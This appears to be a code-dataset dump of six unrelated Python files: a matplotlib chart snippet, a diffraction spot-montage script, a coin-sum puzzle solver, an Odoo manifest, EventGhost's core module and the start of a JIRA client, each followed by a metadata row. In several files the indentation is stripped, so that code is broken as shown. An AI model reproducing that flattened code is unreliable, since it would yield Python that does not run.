corps = pd.DataFrame(np.random.random(size=(6, 6)), index=['NT', 'LXX', 'Josephus', 'Philo', 'Plutarch', 'Perseus'], columns=['NT', 'LXX', 'Josephus', 'Philo', 'Plutarch', 'Perseus'])
fig, ax = plt.subplots()
index = np.arange(len(corps))*1.2
bar_width = 0.15
opacity = 0.4
#error_config = {'ecolor': '0.3'}
mult = 0
for corp in corps:
rects = plt.bar(index + bar_width * mult, corps.ix[corp], bar_width, color='.9', label=corp)
rects.remove()
for i, rect in enumerate(rects):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width() / 2., height / 2, corp, size='small', rotation='vertical', ha='center', va='bottom')
mult += 1
plt.xlabel('Group')
plt.ylabel('Scores')
plt.title('Scores by group and gender')
plt.xticks(index + 3 * bar_width, [x for x in corps])
plt.savefig('cs_corps_test.png', dpi=500)
| gpl-3.0 | -7,344,222,544,633,724,000 | 32.833333 | 198 | 0.598192 | false |
joelvbernier/hexrd-sandbox | multipanel_ff/spot_montage.py | 1 | 4998 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 19 15:29:27 2017
@author: bernier2
"""
import argparse
import numpy as np
import h5py
from matplotlib import pyplot as plt
"""
# UNCOMMENT IF YOU HAVE A SANE LATEX ENV AND WANT NICE FIG LABELS
#
# Options
params = {'text.usetex': True,
'font.size': 14,
'font.family': 'mathrm',
'text.latex.unicode': True,
'pgf.texsystem': 'pdflatex'
}
plt.rcParams.update(params)
"""
plt.ion()
def montage(X, colormap=plt.cm.inferno, show_borders=True,
title=None, xlabel=None, ylabel=None,
threshold=None, filename=None):
m, n, count = np.shape(X)
img_data = np.log(X - np.min(X) + 1)
if threshold is None:
threshold = 0.
else:
threshold = np.log(threshold - np.min(X) + 1)
mm = int(np.ceil(np.sqrt(count)))
nn = mm
M = np.zeros((mm * m, nn * n))
# colormap
colormap.set_under('b')
fig, ax = plt.subplots()
image_id = 0
for j in range(mm):
sliceM = j * m
ax.plot()
for k in range(nn):
if image_id >= count:
img = np.nan*np.ones((m, n))
else:
img = img_data[:, :, image_id]
sliceN = k * n
M[sliceM:sliceM + m, sliceN:sliceN + n] = img
image_id += 1
# M = np.sqrt(M + np.min(M))
im = ax.imshow(M, cmap=colormap, vmin=threshold, interpolation='nearest')
if show_borders:
xs = np.vstack(
[np.vstack([[n*i, n*i] for i in range(nn+1)]),
np.tile([0, nn*n], (mm+1, 1))]
)
ys = np.vstack(
[np.tile([0, mm*m], (nn+1, 1)),
np.vstack([[m*i, m*i] for i in range(mm+1)])]
)
for xp, yp in zip(xs, ys):
ax.plot(xp, yp, 'c:')
    if xlabel is None:
        ax.set_xlabel(r'$2\theta$', fontsize=14)
    else:
        ax.set_xlabel(xlabel, fontsize=14)
    if ylabel is None:
        ax.set_ylabel(r'$\eta$', fontsize=14)
    else:
        ax.set_ylabel(ylabel, fontsize=14)
ax.axis('normal')
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.spines['left'].set_visible(False)
cbar_ax = fig.add_axes([0.875, 0.155, 0.025, 0.725])
cbar = fig.colorbar(im, cax=cbar_ax)
cbar.set_label(r"$\ln(intensity)$", labelpad=5)
ax.set_xticks([])
ax.set_yticks([])
if title is not None:
        ax.set_title(title, fontsize=18)
if filename is not None:
fig.savefig(filename, bbox_inches='tight', dpi=300)
return M
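# Illustrative call with random data (purely for demonstration):
#   X = np.random.poisson(5., size=(20, 30, 9))   # eta bins x tth bins x spots
#   montage(X, title='demo', threshold=2., filename='montage_demo.png')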
def plot_gvec_from_hdf5(fname, gvec_id, threshold=0.):
"""
"""
f = h5py.File(fname, 'r')
for det_key, panel_data in f['reflection_data'].iteritems():
for spot_id, spot_data in panel_data.iteritems():
attrs = spot_data.attrs
if attrs['hkl_id'] == gvec_id:
# grab some data
tth_crd = np.degrees(spot_data['tth_crd'])
eta_crd = np.degrees(spot_data['eta_crd'])
intensities = np.transpose(
np.array(spot_data['intensities']),
(1, 2, 0)
)
# make labels
figname = r'Spot %d, ' % attrs['peak_id'] \
+ r"detector '%s', " % det_key \
+ r'({:^3} {:^3} {:^3})'.format(*attrs['hkl'])
xlabel = r'$2\theta\in(%.3f, %.3f)$' \
% (tth_crd[0], tth_crd[-1])
ylabel = r'$\eta\in(%.3f, %.3f)$' \
% (eta_crd[0], eta_crd[-1])
# make montage
montage(intensities, title=figname,
xlabel=xlabel, ylabel=ylabel,
threshold=threshold)
pass
pass
pass
f.close()
return
# =============================================================================
# %% CMD LINE HOOK
# =============================================================================
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Montage of spot data for a specifed G-vector family")
parser.add_argument('hdf5_archive',
help="hdf5 archive filename",
type=str)
parser.add_argument('gvec_id',
help="unique G-vector ID from PlaneData",
type=int)
parser.add_argument('-t', '--threshold',
help="intensity threshold",
type=float, default=0.)
args = parser.parse_args()
h5file = args.hdf5_archive
hklid = args.gvec_id
threshold = args.threshold
    plot_gvec_from_hdf5(h5file, hklid, threshold=threshold)
| gpl-3.0 | 2,192,930,690,850,654,200 | 29.055901 | 79 | 0.473589 | false |
SwordYoung/cutprob | leetcode/palantir/test.py | 1 | 3464 | #!/usr/bin/env python
class Solution:
def __init__(self):
self.solution_dict = {}
self.n_set = set()
self.gcd = []
def pre_quit(self, in_n, in_b, up_bound):
if in_n < 0 or in_b < 0:
return True, -1 # impossible
if in_n == 0:
return True, 0
if in_n in self.n_set:
return True, 1
if in_n % self.gcd[in_b] != 0:
return True, -1
max_possible = in_n / self.in_b_numbers[in_b]
if in_n % self.in_b_numbers[in_b] == 0:
return True, max_possible
if up_bound != -1 and max_possible >= up_bound:
return True, -1
return False, 0
def find_solution(self, in_n, in_b, up_bound):
is_pre_quit, ret_value = self.pre_quit(in_n, in_b, up_bound)
if is_pre_quit:
return ret_value
max_possible = in_n / self.in_b_numbers[in_b]
min_sum = -1
min_iter = up_bound
for i in xrange(max_possible, -1, -1):
if min_iter == 0:
break
res = self.find_solution(in_n - self.in_b_numbers[in_b] * i, in_b-1, -1 if up_bound == -1 else up_bound-i)
if res != -1:
if min_iter == -1 or min_iter > res:
min_iter = res
res = res + i
if min_sum == -1 or min_sum > res:
min_sum = res
if up_bound == -1:
up_bound = min_sum
if min_iter != -1:
min_iter -= 1
return min_sum
def calculate_gcd(self):
def cal_gcd(a, b):
if a < b:
return cal_gcd(b, a)
if b == 0:
return a
return cal_gcd(a % b, b)
self.gcd.append(self.in_b_numbers[0])
for i in xrange(1, len(self.in_b_numbers)):
self.gcd.append(cal_gcd(self.gcd[i-1], self.in_b_numbers[i]))
def solve(self, in_n, in_b, in_b_numbers):
self.in_n = in_n
self.in_b_numbers = in_b_numbers
self.in_b_numbers.sort()
self.n_set = set(self.in_b_numbers)
self.calculate_gcd()
result = self.find_solution(in_n, in_b-1, -1)
return result
def solve(in_n, in_b, in_b_numbers):
print "input: n is %d, b is %d" % (in_n, in_b)
print "in_b_numbers is %s" % (in_b_numbers)
result = Solution().solve(in_n, in_b, in_b_numbers)
if result == -1:
print "IMPOSSIBLE"
else:
print result
# utility function for input
def read_line():
line = raw_input()
line = line.strip()
return line
def read_strs():
line = read_line()
strs = line.split(' ')
return strs
def read_numbers():
nums = read_strs()
for i in xrange(len(nums)):
nums[i] = int(nums[i])
return nums
def runtest():
in_line1 = read_numbers()
in_n = in_line1[0]
in_b = in_line1[1]
in_b_numbers = read_numbers()
assert len(in_b_numbers) == in_b
solve(in_n, in_b, in_b_numbers)
def runtests():
num_tests = read_numbers()[0]
for i in xrange(num_tests):
runtest()
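# Expected stdin / in.txt layout, inferred from runtests()/runtest() above:
#   2            <- number of test cases
#   10 3         <- n and b for the first case
#   1 3 5        <- the b numbers for the first case
#   7 2
#   2 4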
# if __name__ == "__main__":
if __name__ == "__test__":
runtests()
# if __name__ == "__test__":
if __name__ == "__main__":
infile = open("in.txt", 'r')
import sys
sys.stdin = infile
runtests()
infile.close()
| artistic-2.0 | 2,810,316,721,161,853,000 | 26.0625 | 118 | 0.480658 | false |
moneygrid/vertical-exchange | exchange/__openerp__.py | 1 | 1460 | # -*- coding: utf-8 -*-
# © <2016> <Moneygrid Project, Lucas Huber, Yannick Buron>
# based on account_wallet by Yannick Buron, Copyright Yannick Buron
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl.html).
{
'name': 'Exchange / Community Banking',
'version': '9.0.0.1.x',
'category': 'Exchange',
'author': 'Lucas Huber, moneygrid Project',
'license': 'LGPL-3',
'summary': 'Community Exchange/Wallet Backend',
'website': 'https://github.com/moneygrid/vertical-exchange',
'depends': [
'account_accountant',
'base_exchange',
'exchange_provider',
'exchange_provider_internal',
],
'data': [
# 'security/exchange_security.xml',
# 'security/ir.model.access.csv',
'views/exchange_account_view.xml',
'views/exchange_transaction_view.xml',
# 'test_view.xml',
# 'views/exchange_transaction_workflow.xml',
# 'data/exchange_data.xml',
# 'data/account_data.xml',
],
"""
'demo': ['demo/exchange_demo.xml'],
'test': [
'tests/account_wallet_users.yml',
'tests/account_wallet_rights.yml',
'tests/account_wallet_moderator.yml',
'tests/account_wallet_external.yml',
'tests/account_wallet_limits.yml',
'tests/account_wallet_balances.yml',
],
"""
'installable': True,
'application': True,
}
| gpl-3.0 | 6,206,304,104,556,870,000 | 32.930233 | 68 | 0.572995 | false |
WoLpH/EventGhost | eg/Core.py | 1 | 12315 | # -*- coding: utf-8 -*-
#
# This file is part of EventGhost.
# Copyright © 2005-2016 EventGhost Project <http://www.eventghost.net/>
#
# EventGhost is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 2 of the License, or (at your option)
# any later version.
#
# EventGhost is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with EventGhost. If not, see <http://www.gnu.org/licenses/>.
"""
.. attribute:: globals
:class:`eg.Bunch` instance, that holds all global variables used by
PythonCommand actions. PythonScripts (and all other code) can access
these globals through :obj:`eg.globals`.
.. attribute:: event
Instance of the :class:`eg.EventGhostEvent` instance, that is currently
been processed.
.. autofunction:: eg.DummyFunc
"""
import asyncore
import locale
import os
import socket
import sys
import threading
import time
import wx
from os.path import exists, join
# Local imports
import eg
import Init
eg.APP_NAME = "EventGhost"
eg.CORE_PLUGIN_GUIDS = (
"{9D499A2C-72B6-40B0-8C8C-995831B10BB4}", # "EventGhost"
"{A21F443B-221D-44E4-8596-E1ED7100E0A4}", # "System"
"{E974D074-B0A3-4D0C-BBD1-992475DDD69D}", # "Window"
"{6B1751BF-F94E-4260-AB7E-64C0693FD959}", # "Mouse"
)
eg.ID_TEST = wx.NewId()
eg.mainDir = eg.Cli.mainDir
eg.imagesDir = join(eg.mainDir, "images")
eg.languagesDir = join(eg.mainDir, "languages")
eg.sitePackagesDir = join(
eg.mainDir,
"lib%d%d" % sys.version_info[:2],
"site-packages"
)
eg.revision = 2000 # Deprecated
eg.startupArguments = eg.Cli.args
eg.debugLevel = 0
eg.systemEncoding = locale.getdefaultlocale()[1]
eg.document = None
eg.result = None
eg.plugins = eg.Bunch()
eg.globals = eg.Bunch()
eg.globals.eg = eg
eg.event = None
eg.eventTable = {}
eg.eventString = ""
eg.notificationHandlers = {}
eg.programCounter = None
eg.programReturnStack = []
eg.indent = 0
eg.pluginList = []
eg.mainThread = threading.currentThread()
eg.stopExecutionFlag = False
eg.lastFoundWindows = []
eg.currentItem = None
eg.actionGroup = eg.Bunch()
eg.actionGroup.items = []
eg.folderPath = eg.FolderPath()
def _CommandEvent():
"""Generate new (CmdEvent, Binder) tuple
e.g. MooCmdEvent, EVT_MOO = EgCommandEvent()
"""
evttype = wx.NewEventType()
class _Event(wx.PyCommandEvent):
def __init__(self, id, **kw):
wx.PyCommandEvent.__init__(self, evttype, id)
self.__dict__.update(kw)
if not hasattr(self, "value"):
self.value = None
def GetValue(self):
return self.value
def SetValue(self, value):
self.value = value
return _Event, wx.PyEventBinder(evttype, 1)
eg.CommandEvent = _CommandEvent
eg.ValueChangedEvent, eg.EVT_VALUE_CHANGED = eg.CommandEvent()
eg.pyCrustFrame = None
eg.dummyAsyncoreDispatcher = None
if eg.startupArguments.configDir is None:
eg.configDir = join(eg.folderPath.RoamingAppData, eg.APP_NAME)
else:
eg.configDir = eg.startupArguments.configDir
if not exists(eg.configDir):
try:
os.makedirs(eg.configDir)
except:
pass
if eg.startupArguments.isMain:
if exists(eg.configDir):
os.chdir(eg.configDir)
else:
os.chdir(eg.mainDir)
eg.localPluginDir = join(eg.folderPath.ProgramData, eg.APP_NAME, "plugins")
eg.corePluginDir = join(eg.mainDir, "plugins")
eg.pluginDirs = [eg.corePluginDir, eg.localPluginDir]
Init.InitPathsAndBuiltins()
from eg.WinApi.Dynamic import GetCurrentProcessId # NOQA
eg.processId = GetCurrentProcessId()
Init.InitPil()
class Exception(Exception):
def __unicode__(self):
try:
return "\n".join([unicode(arg) for arg in self.args])
except UnicodeDecodeError:
return "\n".join([str(arg).decode('mbcs') for arg in self.args])
class StopException(Exception):
pass
class HiddenAction:
pass
def Bind(notification, listener):
if notification not in eg.notificationHandlers:
notificationHandler = eg.NotificationHandler()
eg.notificationHandlers[notification] = notificationHandler
else:
notificationHandler = eg.notificationHandlers[notification]
notificationHandler.listeners.append(listener)
def CallWait(func, *args, **kwargs):
result = [None]
event = threading.Event()
def CallWaitWrapper():
try:
result[0] = func(*args, **kwargs)
finally:
event.set()
wx.CallAfter(CallWaitWrapper)
event.wait()
return result[0]
def DummyFunc(*dummyArgs, **dummyKwargs):
"""
Just a do-nothing-function, that accepts arbitrary arguments.
"""
pass
def Exit():
"""
Sometimes you want to quickly exit a PythonScript, because you don't
want to build deeply nested if-structures for example. eg.Exit() will
exit your PythonScript immediately.
(Note: This is actually a sys.exit() but will not exit EventGhost,
    because the SystemExit exception is caught for a PythonScript.)
"""
sys.exit()
def HasActiveHandler(eventstring):
for eventHandler in eg.eventTable.get(eventstring, []):
obj = eventHandler
while obj:
if not obj.isEnabled:
break
obj = obj.parent
else:
return True
return False
def MessageBox(message, caption=eg.APP_NAME, style=wx.OK, parent=None):
if parent is None:
style |= wx.STAY_ON_TOP
dialog = eg.MessageDialog(parent, message, caption, style)
result = dialog.ShowModal()
dialog.Destroy()
return result
def Notify(notification, value=None):
if notification in eg.notificationHandlers:
for listener in eg.notificationHandlers[notification].listeners:
listener(value)
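# Minimal sketch of how the Bind/Notify/Unbind trio can be used at runtime. The
# notification name "my.notification" and the listener below are made up purely
# for illustration:
#
#   def OnMyNotification(value):
#       eg.Print("got notification value: %r" % value)
#
#   eg.Bind("my.notification", OnMyNotification)
#   eg.Notify("my.notification", 42)        # calls OnMyNotification(42)
#   eg.Unbind("my.notification", OnMyNotification)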
# pylint: disable-msg=W0613
def RegisterPlugin(
name = None,
description = None,
kind = "other",
author = "[unknown author]",
version = "[unknown version]",
icon = None,
canMultiLoad = False,
createMacrosOnAdd = False,
url = None,
help = None,
guid = None,
**kwargs
):
"""
Registers information about a plugin to EventGhost.
:param name: should be a short descriptive string with the name of the
plugin.
:param description: a short description of the plugin.
:param kind: gives a hint about the category the plugin belongs to. It
should be a string with a value out of ``"remote"`` (for remote
receiver plugins), ``"program"`` (for program control plugins),
``"external"`` (for plugins that control external hardware) or
``"other"`` (if none of the other categories match).
:param author: can be set to the name or a list of names of the
developer(s) of the plugin.
:param version: can be set to a version string.
:param icon: can be a base64 encoded image for the plugin. If
``icon == None``, an "icon.png" will be used if it exists
in the plugin folder.
:param canMultiLoad: set this to ``True``, if a configuration can have
more than one instance of this plugin.
:param createMacrosOnAdd: if set to ``True``, when adding the plugin,
EventGhost will ask the user, if he/she wants to add a folder with all
actions of this plugin to his/her configuration.
:param url: displays a clickable link in the plugin info dialog.
:param help: a longer description and/or additional information for the
plugin. Will be added to
'description'.
:param guid: will help EG to identify your plugin, so there are no name
clashes with other plugins that accidentally might have the same
name and will later ease the update of plugins.
:param \*\*kwargs: just to consume unknown parameters, to make the call
backward compatible.
"""
pass
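# Illustrative (hypothetical) call showing the keyword arguments documented above;
# the plugin name, guid and other values are placeholders, not a real plugin:
#
#   eg.RegisterPlugin(
#       name="My Receiver",
#       description="Example remote receiver plugin.",
#       kind="remote",
#       author="Jane Doe",
#       version="1.0",
#       canMultiLoad=False,
#       guid="{00000000-0000-0000-0000-000000000000}",
#   )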
# pylint: enable-msg=W0613
def RestartAsyncore():
"""
Informs the asyncore loop of a new socket to handle.
"""
oldDispatcher = eg.dummyAsyncoreDispatcher
dispatcher = asyncore.dispatcher()
dispatcher.create_socket(socket.AF_INET, socket.SOCK_STREAM)
eg.dummyAsyncoreDispatcher = dispatcher
if oldDispatcher:
oldDispatcher.close()
if oldDispatcher is None:
# create a global asyncore loop thread
threading.Thread(target=asyncore.loop, name="AsyncoreThread").start()
def RunProgram():
eg.stopExecutionFlag = False
del eg.programReturnStack[:]
while eg.programCounter is not None:
programCounter = eg.programCounter
item, idx = programCounter
item.Execute()
if eg.programCounter == programCounter:
# program counter has not changed. Ask the parent for the next
# item.
if isinstance(item.parent, eg.MacroItem):
eg.programCounter = item.parent.GetNextChild(idx)
else:
eg.programCounter = None
while eg.programCounter is None and eg.programReturnStack:
# we have no next item in this level. So look in the return
# stack if any return has to be executed
eg.indent -= 2
item, idx = eg.programReturnStack.pop()
eg.programCounter = item.parent.GetNextChild(idx)
eg.indent = 0
def StopMacro(ignoreReturn=False):
"""
Instructs EventGhost to stop executing the current macro after the
current action (thus the PythonScript or PythonCommand) has finished.
"""
eg.programCounter = None
if ignoreReturn:
del eg.programReturnStack[:]
def Unbind(notification, listener):
eg.notificationHandlers[notification].listeners.remove(listener)
def Wait(secs, raiseException=True):
while secs > 0.0:
if eg.stopExecutionFlag:
if raiseException:
raise eg.StopException("Execution interrupted by the user.")
else:
return False
if secs > 0.1:
time.sleep(0.1)
else:
time.sleep(secs)
secs -= 0.1
return True
# now assign all the functions above to `eg`
eg.Bind = Bind
eg.CallWait = CallWait
eg.DummyFunc = DummyFunc
eg.Exception = Exception
eg.Exit = Exit
eg.HasActiveHandler = HasActiveHandler
eg.HiddenAction = HiddenAction
eg.MessageBox = MessageBox
eg.Notify = Notify
eg.RegisterPlugin = RegisterPlugin
eg.RestartAsyncore = RestartAsyncore
eg.RunProgram = RunProgram
eg.StopException = StopException
eg.StopMacro = StopMacro
eg.Unbind = Unbind
eg.Wait = Wait
eg.messageReceiver = eg.MainMessageReceiver()
eg.app = eg.App()
# we can't import the Icons module earlier, because wx.App must exist
import Icons # NOQA
eg.Icons = Icons
eg.log = eg.Log()
eg.Print = eg.log.Print
eg.PrintError = eg.log.PrintError
eg.PrintNotice = eg.log.PrintNotice
eg.PrintTraceback = eg.log.PrintTraceback
eg.PrintDebugNotice = eg.log.PrintDebugNotice
eg.PrintStack = eg.log.PrintStack
def TracebackHook(tType, tValue, traceback):
eg.log.PrintTraceback(excInfo=(tType, tValue, traceback))
sys.excepthook = TracebackHook
eg.colour = eg.Colour()
eg.config = eg.Config()
eg.debugLevel = int(eg.config.logDebug)
if eg.startupArguments.isMain and not eg.startupArguments.translate:
eg.text = eg.Text(eg.config.language)
else:
eg.text = eg.Text('en_EN')
eg.actionThread = eg.ActionThread()
eg.eventThread = eg.EventThread()
eg.pluginManager = eg.PluginManager()
eg.scheduler = eg.Scheduler()
eg.TriggerEvent = eg.eventThread.TriggerEvent
eg.TriggerEnduringEvent = eg.eventThread.TriggerEnduringEvent
from eg.WinApi.SendKeys import SendKeysParser # NOQA
eg.SendKeys = SendKeysParser()
setattr(eg, "PluginClass", eg.PluginBase)
setattr(eg, "ActionClass", eg.ActionBase)
eg.taskBarIcon = eg.TaskBarIcon(
eg.startupArguments.isMain and
eg.config.showTrayIcon and
not eg.startupArguments.translate and
not eg.startupArguments.install and
not eg.startupArguments.pluginFile
)
eg.SetProcessingState = eg.taskBarIcon.SetProcessingState
eg.Init = Init
eg.Init.Init()
| gpl-2.0 | 5,448,933,114,497,041,000 | 29.939698 | 78 | 0.687835 | false |
jtakayama/makahiki-draft | makahiki/apps/managers/predicate_mgr/smartgrid_tester_predicates.py | 1 | 10692 | """Predicates indicating if a level or cell should be unlocked."""
from django.db.models.query_utils import Q
from apps.widgets.smartgrid_play_tester import play_tester
from apps.widgets.smartgrid_design.models import DesignerAction, DesignerGrid
from apps.managers.smartgrid_mgr import smartgrid_mgr
def approved_action(user, draft_slug, action_slug):
"""Returns true if the action is approved."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft, action__slug=action_slug,
approval_status="approved").count() > 0
def approved_all_of_level(user, draft_slug, level_priority):
"""Returns True if the user has had all Actions on the given level approved."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
c = 0
count = len(DesignerGrid.objects.filter(draft=draft, level__priority=level_priority))
for action in DesignerGrid.objects.filter(level__priority=level_priority):
c += user.testeractionsubmittion_set.filter(action=action,
approval_status="approved").count()
return c >= count
def approved_all_of_resource(user, draft_slug, resource):
"""Returns True if the user has had all Actions of the given resource approved."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
count = DesignerAction.objects.filter(draft=draft, related_resource=resource).count()
return user.testeractionsubmittion_set.filter(draft=draft, action__related_resource=resource,
approval_status="approved").count() == count
def approved_all_of_type(user, draft_slug, action_type):
"""Returns True if the user has had all Actions of the action_type approved."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
count = DesignerAction.objects.filter(draft=draft, type=action_type).count()
return user.testeractionsubmittion_set.filter(action__type=action_type,
approval_status="approved").count() == count
def approved_some(user, draft_slug, count=1):
"""Returns True if the user has had count Actions approved."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft,
approval_status='approved').count() >= count
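
# Example (with made-up values) of calling one of these predicates directly;
# 'demo-draft' is a hypothetical draft slug and `user` a Django User instance:
#
#   if approved_some(user, 'demo-draft', count=2):
#       pass  # e.g. unlock the next cell or level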
def approved_some_of_level(user, draft_slug, level_priority, count=1):
"""Returns True if the user has had count Actions approved for the given level."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
c = 0
for action in DesignerGrid.objects.filter(draft=draft, level__priority=level_priority):
c += user.testeractionsubmittion_set.filter(action=action,
approval_status="approved").count()
return c >= count
def approved_some_of_resource(user, draft_slug, resource, count=1):
"""Returns true of the user has had count Actions approved with the given resource."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft, action__related_resource=resource,
approval_status="approved").count() >= count
def approved_some_of_type(user, draft_slug, action_type, count=1):
"""Returns true if the user has had count Actions approved with the given action_type."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft, action__type=action_type,
approval_status="approved").count() >= count
def approved_some_full_spectrum(user, draft_slug, count=1):
"""Returns true if the user has had count Activities, Commitments, and Events approved."""
ret = approved_some_of_type(user, draft_slug, action_type='activity', count=count)
ret = ret and approved_some_of_type(user, draft_slug, action_type='commitment', count=count)
ret = ret and approved_some_of_type(user, draft_slug, action_type='event', count=count)
return ret
def completed_level(user, draft_slug, level_priority):
"""Returns true if the user has had all Activities and Commiments on the give level
approved."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
count = len(DesignerGrid.objects.filter(draft=draft,
level__priority=level_priority,
action__type='activity'))
count += len(DesignerGrid.objects.filter(draft=draft,
level__priority=level_priority,
action__type='commitment'))
c = 0
for grid in DesignerGrid.objects.filter(draft=draft,
level__priority=level_priority):
c += user.testeractionsubmittion_set.filter(draft=draft, action=grid.action,
approval_status="approved").count()
c += user.testeractionsubmittion_set.filter(draft=draft, action=grid.action,
action__type="commitment",
approval_status="pending").count()
return c >= count
def social_bonus_count(user, draft_slug, count):
"""Returns True if the number of social bonus the user received equals to count."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft,
social_bonus_awarded=True).count() >= count
def submitted_action(user, draft_slug, action_slug):
"""Returns true if the user complete the action."""
return action_slug in play_tester.get_submitted_actions(user, draft_slug)
def submitted_all_of_level(user, draft_slug, level_priority):
"""Returns True if the user has submitted all Actions on the given level."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
c = 0
count = len(DesignerGrid.objects.filter(draft=draft, level__priority=level_priority))
for action in DesignerGrid.objects.filter(draft=draft, level__priority=level_priority):
c += user.testeractionsubmittion_set.filter(draft=draft, action=action).count()
return c >= count
def submitted_all_of_resource(user, draft_slug, resource):
"""Returns true if user has submitted all Actions of the given resoruce."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
count = DesignerAction.objects.filter(draft=draft, related_resource=resource).count()
c = user.testeractionsubmittion_set.filter(draft=draft,
action__related_resource=resource).count()
return c == count
def submitted_all_of_type(user, draft_slug, action_type):
"""Returns true if user has submitted all Actions of the given action_type."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
count = DesignerAction.objects.filter(draft=draft, type=action_type).count()
return user.testeractionsubmittion_set.filter(draft=draft,
action__type=action_type).count() == count
def submitted_some(user, draft_slug, count=1):
"""Returns true if the user has completed count Actions."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft).count() >= count
def submitted_some_of_level(user, draft_slug, level_priority, count=1):
"""Returns true if the user has completed count Actions of the specified level."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
c = 0
for action in DesignerGrid.objects.filter(draft=draft, level__priority=level_priority):
c += user.testeractionsubmittion_set.filter(action=action).count()
return c >= count
def submitted_some_of_resource(user, draft_slug, resource, count=1):
"""Returns True if user has submitted count Actions with the given resource."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft,
action__related_resource=resource).count() >= \
count
def submitted_some_of_type(user, draft_slug, action_type, count=1):
"""Returns True if user has submitted count Actions with the given action_type."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft,
action__type=action_type).count() >= count
def submitted_some_full_spectrum(user, draft_slug, count=1):
"""Returns true if the user has completed some activities, commitments, and
events."""
ret = submitted_some_of_type(user, draft_slug, action_type='activity', count=count)
ret = ret and submitted_some_of_type(user, draft_slug, action_type='commitment', count=count)
ret = ret and submitted_some_of_type(user, draft_slug, action_type='event', count=count)
return ret
def submitted_level(user, draft_slug, level_priority):
"""Returns true if the user has performed all activities successfully, and
attempted all commitments."""
_ = user
draft = smartgrid_mgr.get_designer_draft(draft_slug)
num_completed = 0
level_actions = DesignerGrid.objects.filter(
Q(action__type='activity') | Q(action__type='commitment'),
draft=draft, level__priority=level_priority)
for grid in level_actions:
testeractionsubmittion = user.testeractionsubmittion_set.filter(draft=draft,
action=grid.action)
if testeractionsubmittion:
num_completed += 1
num_level = level_actions.count()
# check if there is any activity or commitment
if not num_level:
return False
return num_completed == num_level
def unlock_on_date(user, draft_slug, date_string):
"""Returns True."""
_ = user
_ = draft_slug
_ = date_string
return True
def unlock_on_event(user, draft_slug, event_slug, days=0, lock_after_days=0):
"""Returns true if the current date is equal to or after the date of the Event
defined by the event_slug, optionally days before. days should be a negative number.
Optionally lock_after_days, if not zero then will return false lock_after_days
after the event."""
_ = user
_ = draft_slug
_ = event_slug
_ = days
_ = lock_after_days
return True
| mit | -3,509,848,243,233,196,000 | 47.162162 | 97 | 0.65535 | false |
milo-minderbinder/jira | jira/client.py | 1 | 110052 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import print_function
"""
This module implements a friendly (well, friendlier) interface between the raw JSON
responses from JIRA and the Resource/dict abstractions provided by this library. Users
will construct a JIRA object as described below. Full API documentation can be found
at: https://jira-python.readthedocs.org/en/latest/
"""
from functools import wraps
import imghdr
import mimetypes
import copy
import os
import re
import string
import tempfile
import logging
import json
import warnings
import pprint
import sys
import datetime
import calendar
import hashlib
from six.moves.urllib.parse import urlparse, urlencode
from requests.utils import get_netrc_auth
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
from six import string_types, integer_types
# six.moves does not play well with pyinstaller, see https://github.com/pycontribs/jira/issues/38
# from six.moves import html_parser
if sys.version_info < (3, 0, 0):
import HTMLParser as html_parser
else:
import html.parser as html_parser
import requests
try:
from requests_toolbelt import MultipartEncoder
except:
pass
try:
from requests_jwt import JWTAuth
except ImportError:
pass
# JIRA specific resources
from .resources import Resource, Issue, Comment, Project, Attachment, Component, Dashboard, Filter, Votes, Watchers, \
Worklog, IssueLink, IssueLinkType, IssueType, Priority, Version, Role, Resolution, SecurityLevel, Status, User, \
CustomFieldOption, RemoteLink
# GreenHopper specific resources
from .resources import Board, Sprint
from .resilientsession import ResilientSession
from .version import __version__
from .utils import threaded_requests, json_loads, CaseInsensitiveDict
from .exceptions import JIRAError
try:
from random import SystemRandom
random = SystemRandom()
except ImportError:
import random
# warnings.simplefilter('default')
# encoding = sys.getdefaultencoding()
# if encoding != 'UTF8':
# warnings.warn("Python default encoding is '%s' instead of 'UTF8' which means that there is a big change of having problems. Possible workaround http://stackoverflow.com/a/17628350/99834" % encoding)
def translate_resource_args(func):
"""
Decorator that converts Issue and Project resources to their keys when used as arguments.
"""
@wraps(func)
def wrapper(*args, **kwargs):
arg_list = []
for arg in args:
if isinstance(arg, (Issue, Project)):
arg_list.append(arg.key)
else:
arg_list.append(arg)
result = func(*arg_list, **kwargs)
return result
return wrapper
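
# Sketch of what the decorator above enables: methods decorated with
# @translate_resource_args accept either a full resource or its plain key.
# The names below are illustrative only:
#
#   issue = jira.issue('ABC-123')
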